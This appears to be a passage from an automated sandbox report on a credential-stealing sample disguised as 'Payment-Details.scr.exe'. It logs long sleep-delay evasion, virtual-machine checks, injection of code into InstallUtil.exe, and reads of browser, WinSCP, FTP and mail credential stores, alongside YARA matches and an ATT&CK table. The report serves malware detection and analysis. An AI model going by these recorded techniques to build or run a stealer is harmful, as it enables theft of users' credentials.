                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 99015Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 98906Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 98797Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 98687Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 98578Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 98469Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 98359Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 98250Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 98141Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 98031Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 97922Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 97799Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 97686Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 97570Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 97266Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 97156Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 97047Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 96937Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 96828Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 96718Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 96609Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 96500Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 96390Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 96281Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 96172Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 96051Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 95937Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 95828Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 95718Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 95609Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 95500Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 95390Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 95281Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 95172Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 95061Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 94952Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 94809Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 94549Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 94329Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 94203Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 94094Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 93984Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 100000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 99843Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 99718Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 99953Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 99844Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 99734Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 99624Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 99515Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 99406Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 99297Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 99185Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 99078Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 98963Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 98856Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 98750Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 98640Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 98531Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 98422Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 98308Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 98200Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 98094Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 97982Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 97871Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 97764Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 97651Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 97534Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 97406Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 97269Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 97140Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 97028Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 96922Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 96797Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 96683Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 96555Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 96453Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 96342Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 96234Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 96119Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 95989Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 95859Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 95750Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 95640Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 95531Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 95422Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 95312Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 95202Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 95093Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 94904Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 94679Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 94432Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 100000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99875
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99766
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99656
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99546
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99433
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99316
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98983
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98875
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98730
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98605
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98499
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98391
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98275
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98156
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98047
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97937
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97828
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97719
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97594
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97485
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97360
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97235
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97110
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96985
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96860
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96735
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96610
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96485
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96360
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96235
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96110
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95984
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95875
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95766
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95656
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95547
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95437
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95328
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95219
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95094
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94985
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94860
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94735
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94610
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94485
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94360
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94235
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94110
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 93985
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 100000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99875
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99765
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99656
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99546
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99437
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99328
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99218
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99109
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98890
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98781
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98672
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98562
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98453
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98343
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98234
                    Source: InstallUtil.exe, 00000009.00000002.2700908180.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware
                    Source: InstallUtil.exe, 00000009.00000002.2700908180.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
                    Source: Fdimzk.exe, 00000005.00000002.2100971081.0000000002F0D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                    Source: Fdimzk.exe, 00000005.00000002.2100971081.0000000002F0D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: model0Microsoft|VMWare|Virtual
                    Source: Fdimzk.exe, 00000005.00000002.2124173104.000000000410B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMwareVBox
                    Source: Payment-Details.scr.exe, 00000000.00000002.1674818011.0000000001482000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2023490581.0000000004C82000.00000004.00000020.00020000.00000000.sdmp, Fdimzk.exe, 00000004.00000002.2012119620.0000000000A90000.00000004.00000020.00020000.00000000.sdmp, Fdimzk.exe, 00000005.00000002.2097879038.000000000128E000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2116445319.00000000060E0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.2713649134.0000000006000000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe Process information queried: ProcessInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process queried: DebugPort
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe Memory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43E000
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 440000
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 2EC008
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43E000
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 440000
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: D7A008
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: B32008
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe Queries volume information: C:\Users\user\Desktop\Payment-Details.scr.exe VolumeInformation
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe Queries volume information: C:\Users\user\AppData\Roaming\Fdimzk.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information

                    Source: Yara match, File source: 5.2.Fdimzk.exe.41206f0.2.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 4.2.Fdimzk.exe.382ec18.1.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.Payment-Details.scr.exe.4513690.2.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 3.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 4.2.Fdimzk.exe.382ec18.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 5.2.Fdimzk.exe.41206f0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.Payment-Details.scr.exe.4513690.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: Process Memory Space: Payment-Details.scr.exe PID: 432, type: MEMORYSTR
                    Source: Yara match, File source: Process Memory Space: InstallUtil.exe PID: 2332, type: MEMORYSTR
                    Source: Yara match, File source: Process Memory Space: Fdimzk.exe PID: 6012, type: MEMORYSTR
                    Source: Yara match, File source: Process Memory Space: Fdimzk.exe PID: 3228, type: MEMORYSTR
                    Source: Yara match, File source: Process Memory Space: InstallUtil.exe PID: 2740, type: MEMORYSTR
                    Source: Yara match, File source: Process Memory Space: InstallUtil.exe PID: 2852, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\FTP Navigator\Ftplist.txt
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

                    Remote Access Functionality

                    Source: Yara match, File source: 5.2.Fdimzk.exe.41206f0.2.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 4.2.Fdimzk.exe.382ec18.1.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.Payment-Details.scr.exe.4513690.2.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 3.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 4.2.Fdimzk.exe.382ec18.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 5.2.Fdimzk.exe.41206f0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.Payment-Details.scr.exe.4513690.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: Process Memory Space: Payment-Details.scr.exe PID: 432, type: MEMORYSTR
                    Source: Yara match, File source: Process Memory Space: InstallUtil.exe PID: 2332, type: MEMORYSTR
                    Source: Yara match, File source: Process Memory Space: Fdimzk.exe PID: 6012, type: MEMORYSTR
                    Source: Yara match, File source: Process Memory Space: Fdimzk.exe PID: 3228, type: MEMORYSTR
                    Source: Yara match, File source: Process Memory Space: InstallUtil.exe PID: 2740, type: MEMORYSTR
                    Source: Yara match, File source: Process Memory Space: InstallUtil.exe PID: 2852, type: MEMORYSTR
                    | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
                    |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
                    | Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 231 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 2 OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 11 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
